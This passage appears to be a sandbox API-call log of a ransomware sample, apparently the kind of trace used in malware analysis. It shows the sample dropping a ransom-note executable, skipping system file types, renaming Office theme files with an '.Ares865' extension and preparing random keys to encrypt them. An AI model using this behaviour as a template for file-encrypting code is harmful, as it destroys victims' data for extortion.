lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Trek.eftx" | out: lpString1="Trek.eftx") returned="Trek.eftx" [0073.800] lstrlenW (lpString="Trek.eftx") returned 9 [0073.800] lstrlenW (lpString="Ares865") returned 7 [0073.800] lstrcmpiW (lpString1="ek.eftx", lpString2="Ares865") returned 1 [0073.800] lstrlenW (lpString=".dll") returned 4 [0073.800] lstrcmpiW (lpString1="Trek.eftx", lpString2=".dll") returned 1 [0073.800] lstrlenW (lpString=".lnk") returned 4 [0073.800] lstrcmpiW (lpString1="Trek.eftx", lpString2=".lnk") returned 1 [0073.800] lstrlenW (lpString=".ini") returned 4 [0073.800] lstrcmpiW (lpString1="Trek.eftx", lpString2=".ini") returned 1 [0073.800] lstrlenW (lpString=".sys") returned 4 [0073.800] lstrcmpiW (lpString1="Trek.eftx", lpString2=".sys") returned 1 [0073.800] lstrlenW (lpString="Trek.eftx") returned 9 [0073.800] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Urban.eftx" | out: lpString1="Urban.eftx") returned="Urban.eftx" [0073.800] lstrlenW (lpString="Urban.eftx") returned 10 [0073.800] lstrlenW (lpString="Ares865") returned 7 [0073.800] lstrcmpiW (lpString1="an.eftx", lpString2="Ares865") returned -1 [0073.800] lstrlenW (lpString=".dll") returned 4 [0073.800] lstrcmpiW (lpString1="Urban.eftx", lpString2=".dll") returned 1 [0073.800] lstrlenW (lpString=".lnk") returned 4 [0073.800] lstrcmpiW (lpString1="Urban.eftx", lpString2=".lnk") returned 1 [0073.800] lstrlenW (lpString=".ini") returned 4 [0073.800] lstrcmpiW (lpString1="Urban.eftx", lpString2=".ini") returned 1 [0073.800] lstrlenW (lpString=".sys") returned 4 [0073.800] lstrcmpiW (lpString1="Urban.eftx", lpString2=".sys") returned 1 [0073.800] lstrlenW (lpString="Urban.eftx") returned 10 [0073.800] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Verve.eftx" | out: lpString1="Verve.eftx") returned="Verve.eftx" [0073.800] lstrlenW (lpString="Verve.eftx") returned 10 [0073.800] lstrlenW (lpString="Ares865") returned 7 [0073.800] lstrcmpiW (lpString1="ve.eftx", lpString2="Ares865") returned 1 [0073.800] lstrlenW (lpString=".dll") returned 4 [0073.800] lstrcmpiW (lpString1="Verve.eftx", lpString2=".dll") returned 1 [0073.800] lstrlenW (lpString=".lnk") returned 4 [0073.801] lstrcmpiW (lpString1="Verve.eftx", lpString2=".lnk") returned 1 [0073.801] lstrlenW (lpString=".ini") returned 4 [0073.801] lstrcmpiW (lpString1="Verve.eftx", lpString2=".ini") returned 1 [0073.801] lstrlenW (lpString=".sys") returned 4 [0073.801] lstrcmpiW (lpString1="Verve.eftx", lpString2=".sys") returned 1 [0073.801] lstrlenW (lpString="Verve.eftx") returned 10 [0073.801] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Waveform.eftx" | out: lpString1="Waveform.eftx") returned="Waveform.eftx" [0073.801] lstrlenW (lpString="Waveform.eftx") returned 13 [0073.801] lstrlenW (lpString="Ares865") returned 7 [0073.801] lstrcmpiW (lpString1="rm.eftx", lpString2="Ares865") returned 1 [0073.801] lstrlenW (lpString=".dll") returned 4 [0073.801] lstrcmpiW (lpString1="Waveform.eftx", lpString2=".dll") returned 1 [0073.801] lstrlenW (lpString=".lnk") returned 4 [0073.801] lstrcmpiW (lpString1="Waveform.eftx", lpString2=".lnk") returned 1 [0073.801] lstrlenW (lpString=".ini") returned 4 [0073.801] lstrcmpiW (lpString1="Waveform.eftx", lpString2=".ini") returned 1 [0073.801] lstrlenW (lpString=".sys") returned 4 [0073.801] lstrcmpiW (lpString1="Waveform.eftx", lpString2=".sys") returned 1 [0073.801] lstrlenW (lpString="Waveform.eftx") returned 13 [0073.801] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" [0073.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0073.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0073.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 65 [0073.801] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" [0073.801] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.801] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.808] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.808] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d7f3c60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d7f3c60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.808] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.808] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.809] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Adjacency.xml" | out: lpString1="Adjacency.xml") returned="Adjacency.xml" [0073.809] lstrlenW (lpString="Adjacency.xml") returned 13 [0073.809] lstrlenW (lpString="Ares865") returned 7 [0073.809] lstrcmpiW (lpString1="ncy.xml", lpString2="Ares865") returned 1 [0073.809] lstrlenW (lpString=".dll") returned 4 [0073.809] lstrcmpiW (lpString1="Adjacency.xml", lpString2=".dll") returned 1 [0073.809] lstrlenW (lpString=".lnk") returned 4 [0073.809] lstrcmpiW (lpString1="Adjacency.xml", lpString2=".lnk") returned 1 [0073.809] lstrlenW (lpString=".ini") returned 4 [0073.809] lstrcmpiW (lpString1="Adjacency.xml", lpString2=".ini") returned 1 [0073.809] lstrlenW (lpString=".sys") returned 4 [0073.809] lstrcmpiW (lpString1="Adjacency.xml", lpString2=".sys") returned 1 [0073.809] lstrlenW (lpString="Adjacency.xml") returned 13 [0073.809] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.Ares865") returned 87 [0073.809] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml.ares865"), dwFlags=0x1) returned 1 [0073.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=928) returned 1 [0073.810] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.811] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.811] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.814] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.814] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.814] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.815] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Angles.xml" | out: lpString1="Angles.xml") returned="Angles.xml" [0073.815] lstrlenW (lpString="Angles.xml") returned 10 [0073.815] lstrlenW (lpString="Ares865") returned 7 [0073.815] lstrcmpiW (lpString1="les.xml", lpString2="Ares865") returned 1 [0073.815] lstrlenW (lpString=".dll") returned 4 [0073.815] lstrcmpiW (lpString1="Angles.xml", lpString2=".dll") returned 1 [0073.815] lstrlenW (lpString=".lnk") returned 4 [0073.815] lstrcmpiW (lpString1="Angles.xml", lpString2=".lnk") returned 1 [0073.815] lstrlenW (lpString=".ini") returned 4 [0073.815] lstrcmpiW (lpString1="Angles.xml", lpString2=".ini") returned 1 [0073.815] lstrlenW (lpString=".sys") returned 4 [0073.815] lstrcmpiW (lpString1="Angles.xml", lpString2=".sys") returned 1 [0073.815] lstrlenW (lpString="Angles.xml") returned 10 [0073.816] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.Ares865") returned 84 [0073.816] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml.ares865"), dwFlags=0x1) returned 1 [0073.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=925) returned 1 [0073.817] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.817] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.817] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.819] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.820] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.820] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.820] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Apex.xml" | out: lpString1="Apex.xml") returned="Apex.xml" [0073.821] lstrlenW (lpString="Apex.xml") returned 8 [0073.821] lstrlenW (lpString="Ares865") returned 7 [0073.821] lstrcmpiW (lpString1="pex.xml", lpString2="Ares865") returned 1 [0073.821] lstrlenW (lpString=".dll") returned 4 [0073.821] lstrcmpiW (lpString1="Apex.xml", lpString2=".dll") returned 1 [0073.821] lstrlenW (lpString=".lnk") returned 4 [0073.821] lstrcmpiW (lpString1="Apex.xml", lpString2=".lnk") returned 1 [0073.821] lstrlenW (lpString=".ini") returned 4 [0073.821] lstrcmpiW (lpString1="Apex.xml", lpString2=".ini") returned 1 [0073.821] lstrlenW (lpString=".sys") returned 4 [0073.821] lstrcmpiW (lpString1="Apex.xml", lpString2=".sys") returned 1 [0073.821] lstrlenW (lpString="Apex.xml") returned 8 [0073.821] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.Ares865") returned 82 [0073.821] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml.ares865"), dwFlags=0x1) returned 1 [0073.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.822] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=959) returned 1 [0073.823] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.823] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.823] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.825] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.826] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.826] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.827] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Apothecary.xml" | out: lpString1="Apothecary.xml") returned="Apothecary.xml" [0073.827] lstrlenW (lpString="Apothecary.xml") returned 14 [0073.827] lstrlenW (lpString="Ares865") returned 7 [0073.827] lstrcmpiW (lpString1="ary.xml", lpString2="Ares865") returned 1 [0073.827] lstrlenW (lpString=".dll") returned 4 [0073.827] lstrcmpiW (lpString1="Apothecary.xml", lpString2=".dll") returned 1 [0073.827] lstrlenW (lpString=".lnk") returned 4 [0073.827] lstrcmpiW (lpString1="Apothecary.xml", lpString2=".lnk") returned 1 [0073.827] lstrlenW (lpString=".ini") returned 4 [0073.827] lstrcmpiW (lpString1="Apothecary.xml", lpString2=".ini") returned 1 [0073.827] lstrlenW (lpString=".sys") returned 4 [0073.827] lstrcmpiW (lpString1="Apothecary.xml", lpString2=".sys") returned 1 [0073.827] lstrlenW (lpString="Apothecary.xml") returned 14 [0073.827] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.Ares865") returned 88 [0073.827] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml.ares865"), dwFlags=0x1) returned 1 [0073.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.829] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=965) returned 1 [0073.829] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.830] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.830] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.832] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.833] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.833] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.834] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Aspect.xml" | out: lpString1="Aspect.xml") returned="Aspect.xml" [0073.834] lstrlenW (lpString="Aspect.xml") returned 10 [0073.834] lstrlenW (lpString="Ares865") returned 7 [0073.834] lstrcmpiW (lpString1="ect.xml", lpString2="Ares865") returned 1 [0073.834] lstrlenW (lpString=".dll") returned 4 [0073.834] lstrcmpiW (lpString1="Aspect.xml", lpString2=".dll") returned 1 [0073.834] lstrlenW (lpString=".lnk") returned 4 [0073.834] lstrcmpiW (lpString1="Aspect.xml", lpString2=".lnk") returned 1 [0073.834] lstrlenW (lpString=".ini") returned 4 [0073.834] lstrcmpiW (lpString1="Aspect.xml", lpString2=".ini") returned 1 [0073.834] lstrlenW (lpString=".sys") returned 4 [0073.834] lstrcmpiW (lpString1="Aspect.xml", lpString2=".sys") returned 1 [0073.834] lstrlenW (lpString="Aspect.xml") returned 10 [0073.834] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.Ares865") returned 84 [0073.834] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml.ares865"), dwFlags=0x1) returned 1 [0073.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0073.835] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.836] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.836] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.838] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.839] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.839] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.839] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Austin.xml" | out: lpString1="Austin.xml") returned="Austin.xml" [0073.839] lstrlenW (lpString="Austin.xml") returned 10 [0073.839] lstrlenW (lpString="Ares865") returned 7 [0073.839] lstrcmpiW (lpString1="tin.xml", lpString2="Ares865") returned 1 [0073.839] lstrlenW (lpString=".dll") returned 4 [0073.839] lstrcmpiW (lpString1="Austin.xml", lpString2=".dll") returned 1 [0073.839] lstrlenW (lpString=".lnk") returned 4 [0073.839] lstrcmpiW (lpString1="Austin.xml", lpString2=".lnk") returned 1 [0073.839] lstrlenW (lpString=".ini") returned 4 [0073.839] lstrcmpiW (lpString1="Austin.xml", lpString2=".ini") returned 1 [0073.839] lstrlenW (lpString=".sys") returned 4 [0073.839] lstrcmpiW (lpString1="Austin.xml", lpString2=".sys") returned 1 [0073.839] lstrlenW (lpString="Austin.xml") returned 10 [0073.839] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.Ares865") returned 84 [0073.839] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml.ares865"), dwFlags=0x1) returned 1 [0073.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0073.841] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.841] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.841] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.843] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.844] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.844] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.845] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Black Tie.xml" | out: lpString1="Black Tie.xml") returned="Black Tie.xml" [0073.845] lstrlenW (lpString="Black Tie.xml") returned 13 [0073.845] lstrlenW (lpString="Ares865") returned 7 [0073.845] lstrcmpiW (lpString1="Tie.xml", lpString2="Ares865") returned 1 [0073.845] lstrlenW (lpString=".dll") returned 4 [0073.845] lstrcmpiW (lpString1="Black Tie.xml", lpString2=".dll") returned 1 [0073.845] lstrlenW (lpString=".lnk") returned 4 [0073.845] lstrcmpiW (lpString1="Black Tie.xml", lpString2=".lnk") returned 1 [0073.845] lstrlenW (lpString=".ini") returned 4 [0073.845] lstrcmpiW (lpString1="Black Tie.xml", lpString2=".ini") returned 1 [0073.845] lstrlenW (lpString=".sys") returned 4 [0073.845] lstrcmpiW (lpString1="Black Tie.xml", lpString2=".sys") returned 1 [0073.845] lstrlenW (lpString="Black Tie.xml") returned 13 [0073.845] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.Ares865") returned 87 [0073.845] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml.ares865"), dwFlags=0x1) returned 1 [0073.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.846] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=927) returned 1 [0073.846] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.847] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.847] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.849] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.849] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.849] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.850] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Civic.xml" | out: lpString1="Civic.xml") returned="Civic.xml" [0073.850] lstrlenW (lpString="Civic.xml") returned 9 [0073.850] lstrlenW (lpString="Ares865") returned 7 [0073.850] lstrcmpiW (lpString1="vic.xml", lpString2="Ares865") returned 1 [0073.850] lstrlenW (lpString=".dll") returned 4 [0073.850] lstrcmpiW (lpString1="Civic.xml", lpString2=".dll") returned 1 [0073.850] lstrlenW (lpString=".lnk") returned 4 [0073.850] lstrcmpiW (lpString1="Civic.xml", lpString2=".lnk") returned 1 [0073.850] lstrlenW (lpString=".ini") returned 4 [0073.850] lstrcmpiW (lpString1="Civic.xml", lpString2=".ini") returned 1 [0073.850] lstrlenW (lpString=".sys") returned 4 [0073.850] lstrcmpiW (lpString1="Civic.xml", lpString2=".sys") returned 1 [0073.850] lstrlenW (lpString="Civic.xml") returned 9 [0073.850] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.Ares865") returned 83 [0073.850] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml.ares865"), dwFlags=0x1) returned 1 [0073.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0073.851] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 